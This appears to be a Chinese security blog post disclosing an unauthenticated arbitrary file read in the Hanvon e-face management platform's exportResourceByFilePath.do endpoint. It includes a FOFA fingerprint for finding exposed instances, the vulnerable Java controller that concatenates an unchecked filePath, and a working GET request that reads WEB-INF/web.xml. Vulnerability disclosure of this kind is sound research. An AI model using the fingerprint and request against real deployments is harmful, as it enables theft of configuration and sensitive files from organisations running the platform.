汉王e脸通综合管理平台 exportResourceByFilePath.do 任意文件读取漏洞


漏洞简介

汉王e脸通综合管理平台 exportResourceByFilePath.do 接口存在任意文件读取漏洞。攻击者可在无需认证的情况下,通过构造恶意请求访问 exportResourceByFilePath.do 接口,传入任意文件路径参数,实现服务器上任意文件的读取,影响系统敏感数据的泄露和信息安全。

影响版本

v1.6.x

fofa语法

icon_hash="1380907357"

漏洞分析

直接看 LeaveListController 下的 exportResourceByFilePath.do 实现方式

@ResponseBody
@RequestMapping(
    value = {"exportResourceByFilePath.do"},
    method = {RequestMethod.GET}
)
public void exportResourceByFilePath(@RequestParam(required = false,value = "filePath") String filePath, HttpServletResponse response) throws Exception {
    try {
        String path = TheApp.getRootPath("");
        String photoPath = path + filePath;
        File file = new File(photoPath);
        if (file.exists()) {
            InputStream inStream = new FileInputStream(photoPath);
            response.reset();
            response.setContentType("bin");
            response.addHeader("Content-Disposition", "attachment;filename=\"" + new String(filePath.getBytes("utf-8"), "ISO8859-1") + "\"");
            byte[] b = new byte[100];

            int len;
            while((len = inStream.read(b)) > 0) {
                response.getOutputStream().write(b, 0, len);
            }

            inStream.close();
        }
    } catch (IOException e) {
        e.printStackTrace();
    }

}

对用户可控参数 filePath 无任何过滤或校验,直接拼接路径返回文件路径进行文件操作,也是朴实无华的任意文件读取漏洞。

漏洞复现

GET /manage/leaveList/exportResourceByFilePath.do?recoToken=67mds2pxXQb&filePath=WEB-INF/web.xml HTTP/1.1
Host: hanvon.mrxn.net

成功读取到 web.xml 文件


手机扫码阅读

美特CRM mobileupload.jsp 任意文件上传漏洞

MetaCRM 客户关系管理系统 download-new.jsp 任意文件读取漏洞

评 论